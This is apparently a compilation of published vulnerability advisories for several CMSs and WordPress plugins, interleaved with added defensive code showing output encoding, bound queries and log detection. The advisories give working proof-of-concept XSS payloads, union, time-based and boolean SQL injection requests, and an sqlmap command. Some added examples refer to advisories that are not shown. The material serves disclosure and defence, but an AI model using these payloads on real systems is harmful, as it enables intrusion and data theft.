nv4_cltz=120.60.120%257C%252F%257C;
nv4_cltn=RXVyb3BlL0Ftc3RlcmRhbS43MjAwLjE%3D;
nv4c_x4OOk_ctr=MTI3XzBfMF8xLlpa; nv4c_x4OOk_cltz=120.60.120%257C%252F%257C;
gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0;
gnew_language=english; gnew_template=clean;
SESSaca5a63f4c2fc739381fab7741d68783=X4OPoKhvYQz8Q8QwCrVpgq3JuG4fQ84n1XpQQH0SCjo
Connection: close
Upgrade-Insecure-Requests: 1

name=test%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E=test_script_alert=_label=Demo=_default=1_enabled=1_enabled=1_pattern=%5Bnode%3Acontent-type%5D%2F%5Bnode%3Atitle%5D_enabled=1_submitted=1_user_picture=1_default=2_per_page=50_mode=1_user_picture=1_form_location=1_preview=1_settings__active_tab=_build_id=form-biLaugWmv7Z4fGmSK73PYxQZo7hgIwxL2gRwijtrBFA_token=j4801oRGZnTQshQQdJ1IKF7-doK6IhB51F1d4nIPwY4_id=node_type_form=Save+and+add+fields

The variable "name" is not sanitized; later, if you go to the created
content type and click on "Manage Displays":

GET /backdrop/admin/structure/types/manage/test-script-alert/display HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate

The XSS is executed; in the response you can see:

Manage display Customized for test">alert(/XSS/)
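The Composr, CMS Made Simple and Backdrop advisories share one pattern: a stored name is later written into a page inside an attribute value or as element text without encoding, so a `">` prefix closes the attribute and the rest is parsed as markup. The added example below (not code from any of the three projects) shows the unsafe rendering beside the encoded one; the render helpers and the markup around the name are assumptions.

```php
<?php
// Added example (not code from Composr, CMS Made Simple or Backdrop CMS):
// output encoding for a stored name rendered inside an attribute value and
// as element text. Helper names and surrounding markup are assumptions.

declare(strict_types=1);

// htmlspecialchars() with ENT_QUOTES encodes < > & " ' . ENT_QUOTES is the
// part that matters for the advisories' payload: without it the double quote
// passes through and terminates the value="..." attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// The defect: the stored value is concatenated straight into the markup.
function render_name_input_unsafe(string $name): string
{
    return '<input type="text" name="name" value="' . $name . '" />';
}

// The fix: every interpolation goes through h().
function render_name_input(string $name): string
{
    return '<input type="text" name="name" value="' . h($name) . '" />';
}

function render_heading(string $name): string
{
    return '<h2>Manage display: Customized for ' . h($name) . '</h2>';
}

// Does the rendered HTML still contain a live tag from the input?
function leaks_markup(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed stored value shaped like the advisories' payload.
$stored = 'Guests"><script>alert(1)</script>';

echo "unsafe : ", render_name_input_unsafe($stored), "\n";
echo "encoded: ", render_name_input($stored), "\n";
echo "heading: ", render_heading($stored), "\n";

printf("unsafe rendering leaks markup: %s\n", leaks_markup(render_name_input_unsafe($stored)) ? 'yes' : 'no');
printf("encoded rendering leaks markup: %s\n", leaks_markup(render_name_input($stored)) ? 'yes' : 'no');
```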

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser; this can be leveraged to steal sensitive information such as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
Backdrop CMS <= 1.7.1

VII. SOLUTION
-
Install the latest release:
https://github.com/backdrop/backdrop/releases/tag/1.7.2

VIII. REFERENCES
-
https://backdropcms.org/security/backdrop-sa-core-2017-009

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
July 11, 2017 1: Initial release
August 18, 2017 2: Last revision

XI. DISCLOSURE TIMELINE
-
July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
July 11, 2017 2: Sent to vendor
August 17, 2017 3: Vendor fix in version 1.7.2
August 18, 2017 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester



[FD] SQL Injection in TheoCMS <= 2.0

2017-08-11 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-004
- Original release date: July 11, 2017
- Last revised:  August 12, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
SQL Injection in TheoCMS <= 2.0

II. BACKGROUND
-
Theo CMS is an ultra lightweight Content Management System for all types of
websites.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

It is possible to inject SQL code in the variable "cat" on the page
"admin.php".

IV. PROOF OF CONCEPT
-
The following URLs and parameters have been confirmed to suffer from SQL
injection.

/theocms/core/admin.php?cat=0

POC:

/theocms/core/admin.php?cat=0+union+select+1,@@version,3,4+from+cfgs
/theocms/core/admin.php?cat=0+union+select+1,@@hostname,3,4+from+cfgs
/theocms/core/admin.php?cat=0+union+select+1,concat(cfg,data),3,4+from+cfgs
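Both this "cat" parameter and Textpattern's "qty" above are numeric values concatenated into a query. The added example below (not code from TheoCMS or Textpattern) parses such a value strictly and binds it as an integer parameter, so a UNION or INTO OUTFILE suffix never reaches the SQL text. It assumes the `pdo_sqlite` extension; the table and rows are constructed for the demonstration.

```php
<?php
// Added example (not code from TheoCMS or Textpattern): strict parsing plus
// a bound integer parameter for a numeric request value. Assumes pdo_sqlite;
// the schema and rows are constructed.

declare(strict_types=1);

/** Accept only a plain non-negative integer; "0 union select ..." is rejected. */
function parse_non_negative_int(?string $raw): ?int
{
    if ($raw === null || !preg_match('/\A(0|[1-9][0-9]{0,9})\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

/** Look up items by category; the request value is bound, never concatenated. */
function find_by_category(PDO $db, ?string $rawCat): array
{
    $cat = parse_non_negative_int($rawCat);
    if ($cat === null) {
        return [];                                   // bad input: no query at all
    }
    $stmt = $db->prepare('SELECT id, title FROM items WHERE cat = :cat');
    $stmt->bindValue(':cat', $cat, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// In-memory SQLite with constructed rows.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE items (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)');
$db->exec("INSERT INTO items (cat, title) VALUES (0, 'root item'), (1, 'first'), (1, 'second')");

// Constructed request values: a legitimate one, then the two injection shapes
// from the TheoCMS and Textpattern advisories.
$requests = [
    '1',
    '0 union select 1,@@version,3,4 from cfgs',
    "50 into outfile 'x'; -- ",
];
foreach ($requests as $raw) {
    $rows = find_by_category($db, $raw);
    printf("%-42s -> %d row(s)\n", $raw, count($rows));
}
```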

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
TheoCMS <= 2.0

VII. SOLUTION
-
Disable website until a fix is available.

VIII. REFERENCES
-
http://theocms.com

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
July 11, 2017 1: Initial release
August 12, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
July 11, 2017 2: Send to vendor
July 11, 2017 3: Vendor replied that an SQL injection in the admin page is
not a critical vulnerability
August 12, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


[FD] WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection

2017-04-09 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-003
- Original release date: April 06, 2017
- Last revised:  April 10, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection

II. BACKGROUND
-
WordPress Event Calendar is a free, user-friendly, responsive plugin to
manage multiple recurring events, with various options.

III. DESCRIPTION
-
This bug was found using the portal in the following files:

/spider-event-calendar/calendar_functions.php:  if (isset($_POST['order_by'])) {
/spider-event-calendar/widget_Theme_functions.php:if (isset($_POST['order_by']) && $_POST['order_by'] != '') {

And when the query is executed, the parameter "order_by" is not sanitized:

/spider-event-calendar/front_end/frontend_functions.php:  $rows = $wpdb->get_results($query." ".$order_by);

To exploit the vulnerability, it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

It is possible to inject SQL code.

IV. PROOF OF CONCEPT
-
The following URL has been confirmed to suffer from Time Based SQL
Injection.

Time Based SQL Injection POC:

POST /wordpress/wp-admin/admin.php?page=SpiderCalendar HTTP/1.1

search_events_by_title=_number=1_or_not=_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar_for_playlist=_or_desc=1_by=id%2c(select*from(select(sleep(2)))a)
(2 seconds of response)

search_events_by_title=_number=1_or_not=_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar_for_playlist=_or_desc=1_by=id%2c(select*from(select(sleep(30)))a)
(30 seconds of response)

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Spider Event Calendar <= 1.5.51

VII. SOLUTION
-
Vendor released a new version.
https://downloads.wordpress.org/plugin/spider-event-calendar.1.5.52.zip

VIII. REFERENCES
-
https://es.wordpress.org/plugins/spider-event-calendar/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
April 06, 2017 1: Initial release
April 10, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
April 06, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
April 06, 2017 2: Send to vendor
April 07, 2017 3: Vendor fixed the vulnerability and released a new version
April 10, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


[FD] WordPress Plugin Kama Click Counter 3.4.9 - Blind SQL Injection

2017-02-27 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-002
- Original release date: February 21, 2017
- Last revised:  February 28, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
WordPress Plugin Kama Click Counter 3.4.9 - Blind SQL Injection

II. BACKGROUND
-
Using this plugin you will have statistics on clicks on your files or any
other link (not file).

III. DESCRIPTION
-
This bug was found using the portal in the
/wp-content/plugins/kama-clic-counter/admin.php file.

Lines 172 and 173 do not sanitize the input values:

$order_by = ($x= & $_GET['order_by']) ? esc_sql($x) : 'link_date';
$order= ($x= & $_GET['order']) ? esc_sql($x) : 'DESC';

And on line 182 or 186 the SQL statement is executed:

$sql = "SELECT * FROM $wpdb->kcc_clicks WHERE link_url LIKE '%$s%' OR link_name LIKE '%$s%' ORDER BY $order_by $order LIMIT $offset, $limit";
$sql = "SELECT * FROM $wpdb->kcc_clicks ORDER BY $order_by $order LIMIT $offset, $limit";

To exploit the vulnerability, it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

It is possible to inject SQL code.
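Why the escaping in those two lines does not help, shown in Python as an added example (this is not the plugin's code): esc_sql() only rewrites quote, backslash and a few control characters, which is the right defence for a quoted string literal but does nothing for an identifier or keyword spliced into ORDER BY, where a payload needs no quotes at all. The model below mimics that escaping, reproduces the query shape of admin.php, and contrasts it with an allowlist that maps the request value onto a fixed set of column names and directions. The column set and the unprefixed table name kcc_clicks are assumptions.

```python
"""Model of the Kama Click Counter ORDER BY sink: escaping vs. an allowlist.

Added example, not the plugin's code. esc_sql_like() mimics what esc_sql()
does to a string value (the escaping of mysqli_real_escape_string); the two
build_sql_* functions reproduce the query shape from admin.php lines 172-186.
"""
import re
from typing import Optional

# Characters mysqli_real_escape_string() rewrites; nothing else is touched.
_ESCAPES = {
    "\\": "\\\\", "'": "\\'", '"': '\\"',
    "\0": "\\0", "\n": "\\n", "\r": "\\r", "\x1a": "\\Z",
}

# Assumed column set of the (unprefixed) kcc_clicks table.
ALLOWED_COLUMNS = {"link_id", "link_name", "link_url", "link_date", "link_clicks"}


def esc_sql_like(value: str) -> str:
    """Escape quote/backslash/control characters the way esc_sql() does."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_sql_vulnerable(order_by: Optional[str], order: Optional[str]) -> str:
    """Lines 172/173 + 186: identifiers escaped like values, then concatenated.
    An ORDER BY payload needs no quotes, so the escaping never fires."""
    column = esc_sql_like(order_by) if order_by else "link_date"
    direction = esc_sql_like(order) if order else "DESC"
    return f"SELECT * FROM kcc_clicks ORDER BY {column} {direction} LIMIT 0, 20"


def build_sql_hardened(order_by: Optional[str], order: Optional[str]) -> str:
    """Allowlist: request values select from a fixed set and never reach SQL."""
    column = order_by if order_by in ALLOWED_COLUMNS else "link_date"
    direction = "ASC" if (order or "").upper() == "ASC" else "DESC"
    return f"SELECT * FROM kcc_clicks ORDER BY {column} {direction} LIMIT 0, 20"


def order_clause_is_clean(sql: str) -> bool:
    """True when ORDER BY holds exactly one '<column> ASC|DESC' pair."""
    m = re.search(r"ORDER BY (.+?) LIMIT", sql)
    return m is not None and re.fullmatch(r"\w+ (ASC|DESC)", m.group(1)) is not None


if __name__ == "__main__":
    probe = "ASC,(select*from(select(sleep(2)))a)"  # shape of the PoC's order value
    print(build_sql_vulnerable("link_name", probe))  # subquery survives intact
    print(build_sql_hardened("link_name", probe))    # falls back to DESC
```

The general rule this illustrates: escaping is a defence for a specific syntactic slot (a quoted string). Anything that lands in a different slot, such as table and column names, sort directions or LIMIT operands, has to be validated against an allowlist instead.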

IV. PROOF OF CONCEPT
-
The following URLs have been confirmed to suffer from Time Based SQL
Injection.

Time Based SQL Injection POC:

/wordpress/wp-admin/admin.php?page=kama-clic-counter_by=link_name=ASC%2c(select*from(select(sleep(2)))a)=1
(2 seconds of response)

/wordpress/wp-admin/admin.php?page=kama-clic-counter_by=link_name=ASC%2c(select*from(select(sleep(30)))a)=1
(30 seconds of response)

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Kama Click Counter <= 3.4.9

VII. SOLUTION
-
Disable the plugin until a fix is available.

VIII. REFERENCES
-
https://wordpress.org/plugins-wp/kama-clic-counter/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
February 21, 2017 1: Initial release
February 28, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
February 21, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
February 21, 2017 2: Send to vendor
February 24, 2017 3: New contact with vendor without response
February 28, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


[FD] WordPress Plugin Easy Table 1.6 - Persistent Cross-Site Scripting

2017-02-14 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-001
- Original release date: Feb 07, 2017
- Last revised:  Feb 12, 2017
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=

I. VULNERABILITY
-
WordPress Plugin Easy Table 1.6 - Persistent Cross-Site Scripting

II. BACKGROUND
-
Easy Table is a WordPress plugin that allows you to insert tables in an easy way.

III. DESCRIPTION
-
A Persistent XSS vulnerability has been detected in Easy Table that allows
arbitrary HTML/script code to be executed in the context of the victim
user's browser.

IV. PROOF OF CONCEPT
-
Malicious Request:
/wordpress/wp-admin/options-general.php?page=easy-table

easy_table_plugin_option[shortcodetag]
easy_table_plugin_option[attrtag]
easy_table_plugin_option[class]
easy_table_plugin_option[width]
easy_table_plugin_option[border]
easy_table_plugin_option[align]
easy_table_plugin_option[limit]
easy_table_plugin_option[nl]
easy_table_plugin_option[terminator]
easy_table_plugin_option[delimiter]
easy_table_plugin_option[escape]

In all of these parameters an attacker can inject, for example,
">alert(1) to perform a Persistent Cross-Site Scripting attack.
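The reason a value that starts with `">` works is that the saved setting is echoed back into an HTML attribute without encoding, so the quote closes the attribute and the rest becomes markup. As an added example (not code from Easy Table or WordPress), the Python below renders one of the option fields the way a settings page would, once with raw interpolation and once with attribute encoding, and then parses the result the way a browser would to check whether the stored string stayed inside the attribute. The input markup is an assumed shape, not the plugin's template.

```python
"""Attribute-context output encoding, checked by parsing the rendered HTML.

Added example, not Easy Table or WordPress code. The <input> shape is assumed.
"""
import html
from html.parser import HTMLParser
from typing import Dict, List, Tuple


def render_option_input(name: str, value: str, escape: bool) -> str:
    """Render the settings field for one easy_table_plugin_option[...] key.
    With escape=False the stored value is interpolated raw, as the vulnerable
    page does; with escape=True it is HTML-encoded for an attribute context."""
    safe = html.escape(value, quote=True) if escape else value
    return f'<input type="text" name="easy_table_plugin_option[{name}]" value="{safe}" />'


class _Collector(HTMLParser):
    """Records every start tag and its attributes, roughly what a browser builds."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[Tuple[str, Dict[str, str]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(fragment: str) -> List[Tuple[str, Dict[str, str]]]:
    parser = _Collector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def value_contained(fragment: str, expected: str) -> bool:
    """True when the parse yields exactly one <input> whose value attribute
    equals the stored string, i.e. nothing broke out of the attribute."""
    tags = parse_tags(fragment)
    return len(tags) == 1 and tags[0][0] == "input" and tags[0][1].get("value") == expected


if __name__ == "__main__":
    stored = '"><script>alert(1)</script>'
    print(render_option_input("class", stored, escape=False))  # two tags: input, script
    print(render_option_input("class", stored, escape=True))   # one tag, value intact
```

The check is deliberately structural rather than a substring search for `<script`: an encoding bug is proven by the parser producing a different tag tree, not by the presence of a particular keyword, which is also why a filter that only strips known tags is not a substitute for encoding at output time.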

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
Easy Table <= 1.6

VII. SOLUTION
-
Disable the plugin until a fix is available.

VIII. REFERENCES
-
https://wordpress.org/plugins-wp/easy-table/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
Feb 07, 2017 1: Initial release
Feb 12, 2017 2: Last revision

XI. DISCLOSURE TIMELINE
-
Feb 07, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
Feb 07, 2017 2: Send to vendor
Feb 09, 2017 3: New contact with vendor without response
Feb 12, 2017 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester



[FD] Blind SQL Injection PivotX <= v2.3.11

2016-07-15 Thread Manuel Garcia Cardenas
=
MGC ALERT 2016-003
- Original release date: April 14, 2016
- Last revised:  July 14, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Blind SQL Injection PivotX <= v2.3.11

II. BACKGROUND
-
PivotX is an open source blog software written in PHP using either flat
files or a database to store content. It uses the Smarty web template
system and the TinyMCE editor.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.

To exploit the vulnerability, it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

It is possible to inject SQL code in the variable "del" on the page
"/pivotx/pivotx/index.php".

IV. PROOF OF CONCEPT
-
The following URLs and parameters have been confirmed to suffer from Blind
SQL injection.

/pivotx/pivotx/index.php?page=comments=1=1+AND+1=1

/pivotx/pivotx/index.php?page=comments=1=1+AND+1=0

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
PivotX <= v2.3.11

VII. SOLUTION
-
Vendor fixed the vulnerability:
https://sourceforge.net/p/pivot-weblog/code/4474/

VIII. REFERENCES
-
http://pivotx.net/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
April 14, 2016 1: Initial release
April 22, 2016 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
April 14, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
April 14, 2016 2: Send to vendor
April 26, 2016 3: Vendor fixed the vulnerability
July 14, 2016 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


[FD] XSS in CMSimple <= v4.6.2

2016-06-01 Thread Manuel Garcia Cardenas
=
MGC ALERT 2016-004
- Original release date: May 28, 2016
- Last revised:  June 1, 2016
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Reflected XSS in CMSimple <= v4.6.2

II. BACKGROUND
-
CMSimple is a PHP-based Content Management System (CMS) which requires no
database. All data is stored in a simple file system.

III. DESCRIPTION
-
A reflected XSS vulnerability has been detected in the Admin Panel of
CMSimple that allows arbitrary HTML/script code to be executed in the
context of the victim user's browser.

The code injection is done through the parameter "subdir" in the page
"userfiles".

IV. PROOF OF CONCEPT
-
Malicious Request:
/cmsimple/?userfiles=userfiles/

Example:
/cmsimple/?userfiles=userfiles/alert(1)

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
CMSimple <= v4.6.2

VII. SOLUTION
-
Update to version 4.6.3

VIII. REFERENCES
-
http://www.cmsimple.org/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
May 28, 2016 1: Initial release
June 1, 2016 2: Last revision

XI. DISCLOSURE TIMELINE
-
May 28, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
May 28, 2016 2: Send to vendor
May 30, 2016 3: New version that includes patched code
http://cmsimple.org/downloadcounter/dlcount/count.php?id=31
June 1, 2016 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester



[FD] Time-based SQL Injection in Admin panel ImpressCMS <= v1.3.9

2016-04-21 Thread Manuel Garcia Cardenas
=
MGC ALERT 2016-002
- Original release date: April 8, 2016
- Last revised:  April 21, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Time-based SQL Injection in Admin panel ImpressCMS <= v1.3.9

II. BACKGROUND
-
ImpressCMS is a community developed Content Management System for easily
building and maintaining a dynamic web site.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability, it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

It is possible to inject SQL code in the variable
"quicksearch_mod_profile_Field" on the page
"/modules/profile/admin/field.php".

IV. PROOF OF CONCEPT
-
The following URLs and parameters have been confirmed to suffer from Time
Based Blind SQL injection.

quicksearch_mod_profile_Field=') AND (SELECT * FROM
(SELECT(SLEEP(1)))IRLV) AND ('DhUh' LIKE
'DhUh_quicksearch_mod_profile_Field=Search=default=15

quicksearch_mod_profile_Field=') AND (SELECT * FROM
(SELECT(SLEEP(5)))IRLV) AND ('DhUh' LIKE
'DhUh_quicksearch_mod_profile_Field=Search=default=15

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
ImpressCMS <= v1.3.9

VII. SOLUTION
-
Install vendor patch.

VIII. REFERENCES
-
http://www.impresscms.org/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
April 8, 2016 1: Initial release
April 21, 2016 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
April 8, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
April 8, 2016 2: Send to vendor
April 15, 2016 3: New contact to vendor with no response
April 21, 2016 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


[FD] Time-based SQL Injection in Admin panel UliCMS <= v9.8.1

2016-02-03 Thread Manuel Garcia Cardenas
=
MGC ALERT 2016-001
- Original release date: January 26, 2016
- Last revised:  February 02, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Time-based SQL Injection in Admin panel UliCMS <= v9.8.1

II. BACKGROUND
-
UliCMS is a modern web content management solution from Germany that
attempts to make web content management easier.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability, it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

It is possible to inject SQL code in the variable "country_blacklist" on
the page "action=spam_filter".

IV. PROOF OF CONCEPT
-
The following URLs and parameters have been confirmed to suffer from Time
Based Blind SQL injection.

/ulicms/admin/?action=spam_filter

(POST)
spamfilter_enabled=yes_words_blacklist=a_blacklist=ru_spamfilter_settings=Save+Changes

POC using SQLMap:

sqlmap -u "http://127.0.0.1/ulicms/admin/?action=spam_filter; --cookie="SET
COOKIE HERE"
--data="spamfilter_enabled=yes_words_blacklist=a_blacklist=ru_spamfilter_settings=Save+Changes"
-p "country_blacklist" --dbms="mysql" --dbs

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
UliCMS <= v9.8.1

VII. SOLUTION
-
Install vendor patch.

VIII. REFERENCES
-
http://en.ulicms.de/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
January 26, 2016 1: Initial release
February 02, 2015 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
January 26, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
January 26, 2016 2: Send to vendor
January 28, 2016 3: Vendor fix vulnerability
February 02, 2016 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


[FD] Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07

2015-10-05 Thread Manuel Garcia Cardenas
=
MGC ALERT 2015-002
- Original release date: September 18, 2015
- Last revised:  October 05, 2015
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07

II. BACKGROUND
-
PHP-Fusion is a lightweight open source content management system (CMS)
written in PHP.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability, it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application. It is possible to inject SQL
code in the variable "status" on the page "members.php".

IV. PROOF OF CONCEPT
-
The following URLs and parameters have been confirmed to suffer from Blind
SQL injection.

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10=all=0

Exploiting with true request (with mysql5):

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10=all=0'
AND substr(@@version,1,1)='5

Exploiting with false request:

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10=all=0'
AND substr(@@version,1,1)='4
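The SQL injection proofs of concept in the advisories above fall into three shapes: union-based with `@@version` (TheoCMS), time-based with `sleep()` inside a subquery (Spider Event Calendar, Kama Click Counter, ImpressCMS, UliCMS), and boolean-based pairs of true and false requests (PivotX and the PHP-Fusion request just shown). The Python below is an added detection example, not code from any of these advisories or products: it decodes request targets from access-log lines and tags those three indicator families, then lists sources that triggered more than once. The log lines are constructed from the PoC shapes on this page and are not real logs; the POST line carries its body as an extra trailing field, which is not standard log format, and the threshold in suspicious_sources is an assumed tuning value.

```python
"""Tag SQL injection indicators in access-log lines.

Added example; the log lines are constructed from the PoC shapes in these
advisories and are not real server logs. The last field on the POST line is a
request body appended for the demo, which is not part of the standard format.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
10.0.0.5 - - [11/Jul/2017:10:01:02 +0000] "GET /theocms/core/admin.php?cat=0+union+select+1,@@version,3,4+from+cfgs HTTP/1.0" 200 512
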